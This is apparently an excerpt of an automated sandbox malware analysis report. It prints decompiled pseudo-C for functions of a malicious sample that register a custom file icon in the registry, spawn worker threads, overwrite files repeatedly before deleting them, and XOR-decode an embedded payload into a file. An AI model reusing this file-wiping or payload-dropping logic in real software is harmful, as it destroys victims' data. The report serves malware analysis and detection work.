				E00D016D0( &_v612);
				 *0xd25440( &_v612,  &(_a4[1]));
				asm("repne scasw");
				_t96 =  &_v612 - 2;
				 *_t96 = 0x69002e;
				 *((intOrPtr*)(_t96 + 4)) = 0x6f0063;
				 *(_t96 + 8) = 0;
				_t65 = CreateFileW( &_v612, 0x40000000, 0, 0, 2, 0x80, 0); // executed
				_v16 = _t65;
				if(_v16 == 0xffffffff) {
					goto L13;
				}
				_t67 = WriteFile(_v16, _t89, _v24,  &_v20, 0); // executed
				if(_t67 == 0) {
					L12:
					 *0xd254d0(_v16);
					goto L13;
				}
				_t70 = RegCreateKeyExW(0x80000000, _a4, 0, 0, 0, 0x20106, 0,  &_v12, 0); // executed
				if(_t70 != 0) {
					goto L12;
				}
				_t98 =  &(_a4[1]);
				_t74 = RegSetValueExW(_v12,  &_v28, 0, 1, _t98, 2 +  *0xd2543c(_t98) * 2); // executed
				if(_t74 == 0) {
					 *0xd254d0(_v12);
					 *0xd25444( &_v92, _t98);
					asm("repne scasw");
					_t100 =  &_v92 - 2;
					 *_t100 = 0x44005c;
					 *((intOrPtr*)(_t100 + 4)) = 0x660065;
					 *((intOrPtr*)(_t100 + 8)) = 0x750061;
					 *((intOrPtr*)(_t100 + 0xc)) = 0x74006c;
					 *((intOrPtr*)(_t100 + 0x10)) = 0x630049;
					 *((intOrPtr*)(_t100 + 0x14)) = 0x6e006f;
					 *(_t100 + 0x18) = 0;
					_t82 = RegCreateKeyExW(0x80000000,  &_v92, 0, 0, 0, 0x20106, 0,  &_v12, 0); // executed
					if(_t82 == 0) {
						_t88 = RegSetValueExW(_v12,  &_v28, 0, 1,  &_v612, 2 +  *0xd2543c( &_v612) * 2); // executed
						if(_t88 == 0) {
							SHChangeNotify(0x8000000, 0x1000, 0, 0); // executed
							_v8 = 1;
						}
					}
				}
				NtClose(_v12); // executed
				goto L12;
			}























                  0x00d0c360
                  0x00d0c36e
                  0x00d0c5a7
                  0x00d0c5b0
                  0x00d0c5b0
                  0x00d0c374
                  0x00d0c385
                  0x00d0c389
                  0x00000000
                  0x00000000
                  0x00d0c38f
                  0x00d0c3a1
                  0x00d0c3a5
                  0x00d0c5a1
                  0x00d0c5a2
                  0x00000000
                  0x00d0c5a2
                  0x00d0c3ab
                  0x00d0c3ac
                  0x00d0c3b5
                  0x00d0c3bc
                  0x00d0c59b
                  0x00d0c59c
                  0x00000000
                  0x00d0c59c
                  0x00d0c3cf
                  0x00d0c3dc
                  0x00d0c3ef
                  0x00d0c403
                  0x00d0c406
                  0x00d0c409
                  0x00d0c40f
                  0x00d0c416
                  0x00d0c436
                  0x00d0c43c
                  0x00d0c443
                  0x00000000
                  0x00000000
                  0x00d0c456
                  0x00d0c45e
                  0x00d0c592
                  0x00d0c595
                  0x00000000
                  0x00d0c595
                  0x00d0c47f
                  0x00d0c487
                  0x00000000
                  0x00000000
                  0x00d0c490
                  0x00d0c4b1
                  0x00d0c4b9
                  0x00d0c4c2
                  0x00d0c4cd
                  0x00d0c4de
                  0x00d0c4e1
                  0x00d0c4e4
                  0x00d0c4ea
                  0x00d0c4f1
                  0x00d0c4f8
                  0x00d0c4ff
                  0x00d0c506
                  0x00d0c50d
                  0x00d0c530
                  0x00d0c538
                  0x00d0c564
                  0x00d0c56c
                  0x00d0c57c
                  0x00d0c582
                  0x00d0c582
                  0x00d0c56c
                  0x00d0c538
                  0x00d0c58c
                  0x00000000

                  APIs
                    • Part of subcall function 00D06830: RtlAllocateHeap.NTDLL(?,00000008,00000000,?,00D176B5,?,00000000,00000000), ref: 00D06841
                  • CreateFileW.KERNELBASE(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00D0C436
                  • WriteFile.KERNELBASE(000000FF,00000000,000000FF,?,00000000), ref: 00D0C456
                  • RegCreateKeyExW.KERNELBASE(80000000,?,00000000,00000000,00000000,00020106,00000000,?,00000000), ref: 00D0C47F
                  • RegSetValueExW.KERNELBASE(?,00000000,00000000,00000001,?,00000000), ref: 00D0C4B1
                  • RegCreateKeyExW.KERNELBASE(80000000,?,00000000,00000000,00000000,00020106,00000000,?,00000000), ref: 00D0C530
                  • RegSetValueExW.KERNELBASE(?,00000000,00000000,00000001,?,00000000), ref: 00D0C564
                  • SHChangeNotify.SHELL32(08000000,00001000,00000000,00000000), ref: 00D0C57C
                  • NtClose.NTDLL(?), ref: 00D0C58C
                  Memory Dump Source
                  • Source File: 00000000.00000002.519889486.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
                  • Associated: 00000000.00000002.519778542.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520073523.0000000000D1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520095352.0000000000D1B000.00000008.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520253617.0000000000D24000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520309834.0000000000D26000.00000008.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520349173.0000000000D29000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Create$FileValue$AllocateChangeCloseHeapNotifyWrite
                  • String ID:
                  • API String ID: 1108940941-0
                  • Opcode ID: 60a9d675c1cbc553ac7a1e29f7aa35546137d5cd9792e288b546b527a2460276
                  • Instruction ID: 2d025cce635f22e84b163c4b7de6b530bb652136734d393f7fdcd1efe61754c8
                  • Opcode Fuzzy Hash: 60a9d675c1cbc553ac7a1e29f7aa35546137d5cd9792e288b546b527a2460276
                  • Instruction Fuzzy Hash: E5518271A00309BBEB209FA0EC49FAEBB79FB04715F544114F604EA1D0D7B1AA59CBB4
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00D16F90 Relevance: 10.7, APIs: 7, Instructions: 248threadnativeCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 138 d16f90-d16faf 140 d16fb5-d16fbc 138->140 141 d1706d-d17074 138->141 144 d16fe7-d16fee 140->144 145 d16fbe-d16fe4 call d06ab0 140->145 142 d170a1-d170d8 CreateThread * 2 141->142 143 d17076-d1708f CreateThread 141->143 149 d170da call d07c74 142->149 150 d170df-d170e6 142->150 143->142 148 d17091-d1709a 143->148 146 d16ff0-d16ff7 144->146 147 d1702a-d17031 144->147 145->144 146->147 152 d16ff9-d17023 call d09c34 146->152 147->141 154 d17033-d1703a 147->154 148->142 149->150 155 d17100-d17107 150->155 156 d170e8-d170fd CreateThread 150->156 152->147 154->141 161 d1703c-d17066 call d09c34 154->161 157 d17112-d17139 call d0b690 call d0e144 155->157 158 d17109-d17110 155->158 156->155 188 d1713b-d17142 157->188 189 d1717d-d17181 157->189 158->157 164 d1718a-d1718e 158->164 161->141 166 d17190-d1719b 164->166 167 d171a4-d171a8 164->167 166->167 172 d171aa-d171b5 167->172 173 d171be-d171c5 167->173 172->173 179 d171c7-d171d2 NtTerminateThread 173->179 180 d171db-d171e2 173->180 179->180 183 d171e4-d171fd CreateThread 180->183 184 d1720f-d17219 180->184 183->184 186 d171ff-d17208 183->186 191 d1721f-d17226 184->191 192 d172ee-d172fc call d11890 call d11c84 call d11608 184->192 186->184 193 d17144-d17158 call d0a65c call d0e214 call d10994 call d0e214 call d10b40 188->193 194 d1715d-d17164 188->194 189->164 197 d17253-d1725a 191->197 198 d17228-d17241 CreateThread 191->198 230 d17301-d17305 192->230 193->194 195 d17170-d17178 call d0e1cc call d0e214 194->195 196 d17166-d1716b call d0e214 call d0fbe4 194->196 195->189 196->195 205 d17295-d1729c call d0b5d0 197->205 206 d1725c-d17260 197->206 198->197 202 d17243-d1724c 198->202 202->197 222 d172a5-d172a7 call d08200 205->222 223 d1729e-d172a3 call d08930 205->223 212 d17262-d1726d 206->212 213 d17276-d17290 call d06ab0 call d0d95c 206->213 212->213 213->205 235 d172ac-d172b3 222->235 223->235 236 d172b5-d172bc 235->236 237 d172c7-d172e7 call d09610 call d10410 235->237 236->237 240 d172be-d172c5 236->240 243 d172ec 237->243 240->237 240->243 243->230
                  C-Code - Quality: 40%
                  			E00D16F90(void* __edx) {
				char _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				void* _v40;
				void* _t34;
				void* _t35;
				intOrPtr _t39;
				void* _t47;
				void* _t52;
				void* _t57;
				void* _t60;
				void* _t78;
				void* _t80;
				void* _t94;
				void* _t95;
				void* _t96;
				void* _t97;
				void* _t98;
				void* _t102;

				_t102 = __edx;
				_v12 = 0;
				_v20 = 0;
				_v24 = 0;
				_v16 = 0;
				 *0xd256c4(0x43);
				if(0 != 0) {
					L9:
					if( *0xd2512f != 0) {
						_t80 = CreateThread(0, 0, E00D08F38, 0, 0, 0); // executed
						_t96 = _t80;
						if(_t96 != 0) {
							 *0xd25548(_t96, 0xffffffff);
							 *0xd254d0(_t96);
						}
					}
					_t34 = CreateThread(0, 0, E00D07438, 0, 0, 0); // executed
					_v20 = _t34;
					_t35 = CreateThread(0, 0, E00D077FC, 0, 0, 0); // executed
					_v24 = _t35;
					if( *0xd25128 != 0) {
						E00D07C74(); // executed
					}
					if( *0xd25127 != 0) {
						_t78 = CreateThread(0, 0, E00D07E28, 0, 0, 0); // executed
						_v16 = _t78;
					}
					if( *0xd25125 != 0) {
						L18:
						 *0xd25480(0xc803bfc6,  &_v8);
						E00D0B690(_t114); // executed
						_t39 = E00D0E144(); // executed
						_v36 = _t39;
						if(_v36 != 0) {
							_t116 =  *0xd25125;
							if( *0xd25125 != 0) {
								E00D0A65C(); // executed
								E00D0E214(0xffffffff80000001, _t116); // executed
								E00D10994(); // executed
								E00D0E214(0xffffffff80000001, _t116); // executed
								E00D10B40(); // executed
							}
							_t117 =  *0xd25126;
							if( *0xd25126 != 0) {
								E00D0E214(0xffffffff80000001, _t117); // executed
								E00D0FBE4(); // executed
							}
							E00D0E1CC(_v36); // executed
							E00D0E214(0xffffffff80000001, _t117); // executed
						}
						 *0xd25480(_v8,  &_v8);
						goto L25;
					} else {
						_t114 =  *0xd25126;
						if( *0xd25126 == 0) {
							L25:
							if(_v20 != 0) {
								 *0xd25548(_v20, 0xffffffff);
								 *0xd254d0(_v20);
							}
							if(_v24 != 0) {
								 *0xd25548(_v24, 0xffffffff);
								 *0xd254d0(_v24);
							}
							if( *0xd25127 != 0) {
								NtTerminateThread(_v16, 0); // executed
								 *0xd254d0(_v16);
							}
							if( *0xd25135 != 0) {
								_t60 = CreateThread(0, 0, E00D095F8, 0, 0, 0); // executed
								_t95 = _t60;
								if(_t95 != 0) {
									 *0xd25548(_t95, 0xffffffff);
									 *0xd254d0(_t95);
								}
							}
							_push(0x43);
							if( *0xd256c4() != 0) {
								E00D11890();
								E00D11C84(0);
								return E00D11608(__eflags, 0);
							} else {
								if( *0xd2512a != 0) {
									_t57 = CreateThread(0, 0, E00D0BFC0, 0, 0, 0); // executed
									_t94 = _t57;
									if(_t94 != 0) {
										 *0xd25548(_t94, 0xffffffff);
										 *0xd254d0(_t94);
									}
								}
								if( *0xd2512d != 0) {
									if(_v12 != 0) {
										 *0xd25548(_v12, 0xffffffff);
										 *0xd254d0(_v12);
									}
									_t52 =  *0xd25590();
									_v32 = E00D06AB0();
									E00D0D95C(_t102, _v28, _v32, _t52 - _v40);
								}
								if(E00D0B5D0() == 0) {
									_t47 = E00D08200(1);
								} else {
									_t47 = E00D08930();
								}
								if( *0xd25134 != 0 ||  *0xd25130 != 0 ||  *0xd2512e != 0) {
									_t47 = E00D10410(E00D09610(), _t102, _t48,  *0xd25134 & 0x000000ff,  *0xd25130 & 0x000000ff,  *0xd2512e & 0x000000ff);
								}
								return _t47;
							}
						}
						goto L18;
					}
				} else {
					if( *0xd2512d != 0) {
						 *0xd2551c(0, 0, E00D0D7E8, 0, 0, 0);
						_v12 = 0;
						 *0xd25590();
						_v40 = 0;
						_v28 = E00D06AB0();
					}
					if( *0xd25131 != 0 &&  *0xd25168 != 0) {
						_t98 = E00D09C34( *0xd25168,  *0xd2515c,  *0xd25160,  *0xd25164, 0);
						 *0xd25548(_t98, 0xffffffff);
						 *0xd254d0(_t98);
					}
					if( *0xd25132 != 0 &&  *0xd25168 != 0) {
						_t97 = E00D09C34( *0xd25168,  *0xd2515c,  *0xd25160,  *0xd25164, 1);
						 *0xd25548(_t97, 0xffffffff);
						 *0xd254d0(_t97);
					}
					goto L9;
				}
			}



























                  0x00d16f90
                  0x00d16f99
                  0x00d16f9c
                  0x00d16f9f
                  0x00d16fa2
                  0x00d16fa7
                  0x00d16faf
                  0x00d1706d
                  0x00d17074
                  0x00d17085
                  0x00d1708b
                  0x00d1708f
                  0x00d17094
                  0x00d1709b
                  0x00d1709b
                  0x00d1708f
                  0x00d170b0
                  0x00d170b6
                  0x00d170c8
                  0x00d170ce
                  0x00d170d8
                  0x00d170da
                  0x00d170da
                  0x00d170e6
                  0x00d170f7
                  0x00d170fd
                  0x00d170fd
                  0x00d17107
                  0x00d17112
                  0x00d17122
                  0x00d17128
                  0x00d1712d
                  0x00d17132
                  0x00d17139
                  0x00d1713b
                  0x00d17142
                  0x00d17144
                  0x00d17149
                  0x00d1714e
                  0x00d17153
                  0x00d17158
                  0x00d17158
                  0x00d1715d
                  0x00d17164
                  0x00d17166
                  0x00d1716b
                  0x00d1716b
                  0x00d17173
                  0x00d17178
                  0x00d17178
                  0x00d17184
                  0x00000000
                  0x00d17109
                  0x00d17109
                  0x00d17110
                  0x00d1718a
                  0x00d1718e
                  0x00d17195
                  0x00d1719e
                  0x00d1719e
                  0x00d171a8
                  0x00d171af
                  0x00d171b8
                  0x00d171b8
                  0x00d171c5
                  0x00d171cc
                  0x00d171d5
                  0x00d171d5
                  0x00d171e2
                  0x00d171f3
                  0x00d171f9
                  0x00d171fd
                  0x00d17202
                  0x00d17209
                  0x00d17209
                  0x00d171fd
                  0x00d1720f
                  0x00d17219
                  0x00d172ee
                  0x00d172f5
                  0x00000000
                  0x00d1721f
                  0x00d17226
                  0x00d17237
                  0x00d1723d
                  0x00d17241
                  0x00d17246
                  0x00d1724d
                  0x00d1724d
                  0x00d17241
                  0x00d1725a
                  0x00d17260
                  0x00d17267
                  0x00d17270
                  0x00d17270
                  0x00d17276
                  0x00d17286
                  0x00d17290
                  0x00d17290
                  0x00d1729c
                  0x00d172a7
                  0x00d1729e
                  0x00d1729e
                  0x00d1729e
                  0x00d172b3
                  0x00d172e7
                  0x00d172e7
                  0x00000000
                  0x00d172b3
                  0x00d17219
                  0x00000000
                  0x00d17110
                  0x00d16fb5
                  0x00d16fbc
                  0x00d16fcd
                  0x00d16fd3
                  0x00d16fd6
                  0x00d16fdc
                  0x00d16fe4
                  0x00d16fe4
                  0x00d16fee
                  0x00d17018
                  0x00d1701d
                  0x00d17024
                  0x00d17024
                  0x00d17031
                  0x00d1705b
                  0x00d17060
                  0x00d17067
                  0x00d17067
                  0x00000000
                  0x00d17031

                  APIs
                  • CreateThread.KERNELBASE(00000000,00000000,00D08F38,00000000,00000000,00000000), ref: 00D17085
                  • CreateThread.KERNELBASE(00000000,00000000,00D07438,00000000,00000000,00000000), ref: 00D170B0
                  • CreateThread.KERNELBASE(00000000,00000000,00D077FC,00000000,00000000,00000000), ref: 00D170C8
                  • CreateThread.KERNELBASE(00000000,00000000,00D07E28,00000000,00000000,00000000), ref: 00D170F7
                  • NtTerminateThread.NTDLL(?,00000000), ref: 00D171CC
                  • CreateThread.KERNELBASE(00000000,00000000,00D095F8,00000000,00000000,00000000), ref: 00D171F3
                  • CreateThread.KERNELBASE(00000000,00000000,00D0BFC0,00000000,00000000,00000000), ref: 00D17237
                  Memory Dump Source
                  • Source File: 00000000.00000002.519889486.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
                  • Associated: 00000000.00000002.519778542.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520073523.0000000000D1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520095352.0000000000D1B000.00000008.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520253617.0000000000D24000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520309834.0000000000D26000.00000008.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520349173.0000000000D29000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Thread$Create$Terminate
                  • String ID:
                  • API String ID: 1922322686-0
                  • Opcode ID: 97e709fca2ea8e43b36132fb696f7da62a3b3091e9e1336bbdae996f155d0e12
                  • Instruction ID: 2c0395d1a4d461dd34465ab6d4c6a79415fdcd30ee4fe70f29a09283f251aa9a
                  • Opcode Fuzzy Hash: 97e709fca2ea8e43b36132fb696f7da62a3b3091e9e1336bbdae996f155d0e12
                  • Instruction Fuzzy Hash: 3E918F70A48744BEEB326BB0BC4AFAD7A75AB28715F180114F215E42F5CBB419D2CB35
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00D06654 Relevance: 10.7, APIs: 7, Instructions: 161filenativememoryCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 246 d06654-d06667 247 d0666a-d0666f 246->247 247->247 248 d06671-d06685 call d0a064 247->248 251 d06691-d066b3 CreateFileW 248->251 252 d06687-d0668b 248->252 253 d067b6-d067b8 251->253 254 d066b9-d066bb 251->254 252->251 252->253 255 d067bb-d067be 253->255 256 d066be-d066e7 NtAllocateVirtualMemory 254->256 259 d067c0-d067d9 NtFreeVirtualMemory 255->259 260 d067df-d067e3 255->260 257 d066e9-d066f4 256->257 258 d066ef 256->258 264 d066f6-d06705 257->264 265 d06707-d0670a 257->265 262 d0671f-d06724 258->262 259->260 260->255 263 d067e5-d067e9 260->263 266 d06727-d06732 262->266 267 d067f4-d0680b call d06544 DeleteFileW 263->267 268 d067eb-d067ee NtClose 263->268 269 d06719-d0671d 264->269 265->269 270 d0670c-d06714 call d06614 265->270 271 d06740 266->271 272 d06734-d0673e 266->272 278 d06814-d06818 267->278 279 d0680d 267->279 268->267 269->256 269->262 270->269 275 d06745-d0674c 271->275 272->275 277 d0674f-d06765 WriteFile 275->277 282 d06767 277->282 283 d06769-d06786 SetFilePointerEx 277->283 280 d06822-d0682b 278->280 281 d0681a-d0681d call d0684c 278->281 279->278 281->280 284 d06788-d0678f 282->284 283->277 283->284 286 d06791 284->286 287 d06793-d067b1 284->287 286->253 287->266
                  C-Code - Quality: 70%
                  			E00D06654(union _LARGE_INTEGER* __edx, WCHAR* _a4) {
				WCHAR* _v8;
				void* _v12;
				long _v16;
				void* _v20;
				long _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				long _v40;
				WCHAR* _v44;
				char _v56;
				int _t59;
				int _t62;
				long _t70;
				void* _t71;
				signed int _t75;
				void* _t79;
				void* _t80;
				void* _t81;
				long _t82;
				union _LARGE_INTEGER* _t86;
				char* _t88;
				void* _t93;

				_t86 = __edx;
				_v8 = 0;
				_v44 = 0;
				_t79 = 0;
				do {
					asm("stosd");
					_t79 = _t79 + 1;
				} while (_t79 != 3);
				_v12 = 0xffffffffffffffff;
				_t59 = E00D0A064(_a4,  &_v40); // executed
				if(_v40 != 0 || _v36 != 0) {
					_t59 = CreateFileW(_a4, 0x40000000, 3, 0, 3, 0x80000000, 0); // executed
					_v12 = _t59;
					if(_v12 != 0xffffffff) {
						_t81 = 0;
						_t88 =  &_v56;
						while(1) {
							_v24 = 0x10000;
							_v20 = 0;
							_t70 = NtAllocateVirtualMemory(0xffffffff,  &_v20, 0,  &_v24, 0x1000, 4); // executed
							if(_t70 != 0) {
								break;
							}
							_t75 = _v20;
							asm("stosd");
							if(_t81 != 1) {
								if(_t81 == 2) {
									E00D06614( *(_t88 - 4), 0x10000);
								}
							} else {
								memset( *(_t88 - 4), _t75 | 0xffffffff, 0x4000 << 2);
								_t93 = _t93 + 0xc;
								_t88 = _t88;
							}
							_t81 = _t81 + 1;
							if(_t81 != 3) {
								continue;
							}
							L14:
							_t71 = 0;
							_v32 = 0;
							_v28 = 0;
							while(1) {
								L15:
								_t23 =  &_v40;
								 *_t23 = _v40 - 0x10000;
								asm("sbb dword [ebp-0x20], 0x0");
								if( *_t23 >= 0) {
									_t82 = 0x10000;
								} else {
									_v40 = _v40 + 0x10000;
									_t82 = _v40;
								}
								_v16 = 3;
								while(1) {
									asm("lodsd");
									_t59 = WriteFile(_v12, _t71, _t82,  &_v24, 0); // executed
									if(_t59 == 0) {
										break;
									}
									_t86 = _t86 | 0xffffffff;
									_push(1);
									_t71 = SetFilePointerEx(_v12,  ~_t82, _t86, 0); // executed
									_v16 = _v16 - 1;
									if(_v16 != 0) {
										continue;
									}
									L22:
									if(_v24 >= 0x10000) {
										_v32 = _v32 + 0x10000;
										asm("adc dword [ebp-0x18], 0x0");
										_t71 =  *0xd25544(_v12, _v32, _v28, 0, 0);
										goto L15;
									}
									goto L25;
								}
								goto L22;
							}
						}
						goto L14;
					}
				}
				L25:
				_t80 = 0;
				do {
					asm("lodsd");
					if(_t59 != 0) {
						_v20 = _t59;
						_v24 = 0x10000;
						_t59 =  *0xd254e8(0xffffffff,  &_v20,  &_v24, 0x8000); // executed
					}
					_t80 = _t80 + 1;
				} while (_t80 != 3);
				if(_v12 != 0xffffffff) {
					NtClose(_v12); // executed
				}
				E00D06544(_a4,  &_v44); // executed
				_t62 = DeleteFileW(_v44); // executed
				if(_t62 != 0) {
					_v8 = 1;
				}
				if(_v44 != 0) {
					E00D0684C(_v44);
				}
				return _v8;
			}


























                  0x00d06654
                  0x00d0665f
                  0x00d06662
                  0x00d06665
                  0x00d0666a
                  0x00d0666a
                  0x00d0666b
                  0x00d0666c
                  0x00d06672
                  0x00d0667c
                  0x00d06685
                  0x00d066a6
                  0x00d066ac
                  0x00d066b3
                  0x00d066b9
                  0x00d066bb
                  0x00d066be
                  0x00d066be
                  0x00d066c5
                  0x00d066df
                  0x00d066e7
                  0x00000000
                  0x00000000
                  0x00d066e9
                  0x00d066ec
                  0x00d066f4
                  0x00d0670a
                  0x00d06714
                  0x00d06714
                  0x00d066f6
                  0x00d06702
                  0x00d06702
                  0x00d06704
                  0x00d06704
                  0x00d06719
                  0x00d0671d
                  0x00000000
                  0x00000000
                  0x00d0671f
                  0x00d0671f
                  0x00d06721
                  0x00d06724
                  0x00d06727
                  0x00d06727
                  0x00d06727
                  0x00d06727
                  0x00d0672e
                  0x00d06732
                  0x00d06740
                  0x00d06734
                  0x00d06734
                  0x00d0673b
                  0x00d0673b
                  0x00d06745
                  0x00d0674f
                  0x00d0674f
                  0x00d0675d
                  0x00d06765
                  0x00000000
                  0x00000000
                  0x00d0676d
                  0x00d06770
                  0x00d06779
                  0x00d0677f
                  0x00d06786
                  0x00000000
                  0x00000000
                  0x00d06788
                  0x00d0678f
                  0x00d06793
                  0x00d0679a
                  0x00d067ab
                  0x00000000
                  0x00d067ab
                  0x00000000
                  0x00d06791
                  0x00000000
                  0x00d06767
                  0x00d06727
                  0x00000000
                  0x00d066ef
                  0x00d066b3
                  0x00d067b6
                  0x00d067b6
                  0x00d067bb
                  0x00d067bb
                  0x00d067be
                  0x00d067c0
                  0x00d067c3
                  0x00d067d9
                  0x00d067d9
                  0x00d067df
                  0x00d067e0
                  0x00d067e9
                  0x00d067ee
                  0x00d067ee
                  0x00d067fb
                  0x00d06803
                  0x00d0680b
                  0x00d0680d
                  0x00d0680d
                  0x00d06818
                  0x00d0681d
                  0x00d0681d
                  0x00d0682b

                  APIs
                  • CreateFileW.KERNELBASE(00D077A6,40000000,00000003,00000000,00000003,80000000,00000000,00D077A6,?,?,00000000,?), ref: 00D066A6
                  • NtAllocateVirtualMemory.NTDLL(000000FF,00000000,00000000,00010000,00001000,00000004,?,00000000,?), ref: 00D066DF
                  • WriteFile.KERNELBASE(000000FF,00000000,00010000,00010000,00000000,?,00000000,?), ref: 00D0675D
                  • SetFilePointerEx.KERNELBASE(000000FF,00010000,?,00000000,00000001,?,00000000,?), ref: 00D06779
                  • NtFreeVirtualMemory.NTDLL(000000FF,?,00010000,00008000,?,00000000,?), ref: 00D067D9
                  • NtClose.NTDLL(000000FF,?,00000000,?), ref: 00D067EE
                  • DeleteFileW.KERNELBASE(?,000000FF,?,?,00000000,?), ref: 00D06803
                  Memory Dump Source
                  • Source File: 00000000.00000002.519889486.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
                  • Associated: 00000000.00000002.519778542.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520073523.0000000000D1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520095352.0000000000D1B000.00000008.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520253617.0000000000D24000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520309834.0000000000D26000.00000008.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520349173.0000000000D29000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: File$MemoryVirtual$AllocateCloseCreateDeleteFreePointerWrite
                  • String ID:
                  • API String ID: 3569053182-0
                  • Opcode ID: 77636066a0cb23dea3198ec5f3f6b8f678cf233aec3d722abf139927c84ac15c
                  • Instruction ID: 1e75793d229328b686df5bf004f6fde775ab00b1e80f2dcb76864cdf5f0c2b3e
                  • Opcode Fuzzy Hash: 77636066a0cb23dea3198ec5f3f6b8f678cf233aec3d722abf139927c84ac15c
                  • Instruction Fuzzy Hash: 47513C71900209AFDF21CFA4DC44BEEBBB9EB44328F240125F615B61D0D7B59EA58B71
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00D0C1E8 Relevance: 9.1, APIs: 6, Instructions: 134filenativeCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 289 d0c1e8-d0c213 CreateFileW 290 d0c349-d0c34f 289->290 291 d0c219-d0c232 289->291 292 d0c238-d0c24a call d017bc 291->292 295 d0c251-d0c274 WriteFile 292->295 296 d0c276-d0c285 NtClose 295->296 297 d0c288-d0c2ad WriteFile 295->297 298 d0c2c1-d0c2e4 WriteFile 297->298 299 d0c2af-d0c2be 297->299 300 d0c2e6-d0c2f5 298->300 301 d0c2f8-d0c31d WriteFile 298->301 303 d0c331-d0c33e 301->303 304 d0c31f-d0c32e 301->304 303->295 306 d0c344 303->306 306->292
                  C-Code - Quality: 49%
                  			E00D0C1E8(WCHAR* _a4) {
				void* _v8;
				long _v12;
				void _v13;
				long _v20;
				intOrPtr _v24;
				signed char _v28;
				char _v32;
				void* _t53;
				intOrPtr _t56;
				int _t57;
				int _t60;
				int _t63;
				int _t66;
				long _t72;
				unsigned int _t73;
				signed char _t74;
				unsigned int _t76;

				_t53 = CreateFileW(_a4, 0x40000000, 0, 0, 2, 0x80, 0); // executed
				_v8 = _t53;
				if(_v8 == 0xffffffff) {
					return _t53;
				} else {
					_t74 =  *0x00D26004;
					_v32 =  *0xd26000;
					_v28 = _t74;
					_t56 =  *0xd25174; // 0x1835
					_v24 = _t56;
					while(1) {
						L2:
						_t57 =  &_v32;
						_push(_t57);
						_push(0xd26000);
						L00D017BC();
						_t73 = _t57;
						_t76 = _t74;
						_v20 = 2;
						while(1) {
							asm("lodsb");
							_v13 = _t57;
							_v13 = _v13 ^ _t73;
							_t60 = WriteFile(_v8,  &_v13, 1,  &_v12, 0); // executed
							_v24 = _v24 - 1;
							if(_v24 == 0) {
								break;
							}
							asm("lodsb");
							_v13 = _t60;
							_v13 = _v13 ^ _t76;
							_t63 = WriteFile(_v8,  &_v13, 1,  &_v12, 0); // executed
							_v24 = _v24 - 1;
							if(_v24 != 0) {
								asm("lodsb");
								_v13 = _t63;
								_v13 = _v13 ^ _t73;
								_t66 = WriteFile(_v8,  &_v13, 1,  &_v12, 0); // executed
								_v24 = _v24 - 1;
								if(_v24 != 0) {
									asm("lodsb");
									_v13 = _t66;
									_t74 = _t76;
									_v13 = _v13 ^ _t74;
									_t57 = WriteFile(_v8,  &_v13, 1,  &_v12, 0); // executed
									_v24 = _v24 - 1;
									if(_v24 != 0) {
										_t73 = _t73 >> 0x10;
										_t76 = _t76 >> 0x10;
										_v20 = _v20 - 1;
										if(_v20 == 0) {
											goto L2;
										}
										continue;
									} else {
										return  *0xd254d0(_v8);
									}
								} else {
									return  *0xd254d0(_v8);
								}
							} else {
								return  *0xd254d0(_v8);
							}
							goto L14;
						}
						_t72 = NtClose(_v8); // executed
						return _t72;
						goto L14;
					}
				}
				L14:
			}




















                  0x00d0c206
                  0x00d0c20c
                  0x00d0c213
                  0x00d0c34f
                  0x00d0c219
                  0x00d0c21f
                  0x00d0c224
                  0x00d0c227
                  0x00d0c22a
                  0x00d0c22f
                  0x00d0c238
                  0x00d0c238
                  0x00d0c238
                  0x00d0c23b
                  0x00d0c23c
                  0x00d0c241
                  0x00d0c246
                  0x00d0c248
                  0x00d0c24a
                  0x00d0c251
                  0x00d0c251
                  0x00d0c252
                  0x00d0c255
                  0x00d0c267
                  0x00d0c26d
                  0x00d0c274
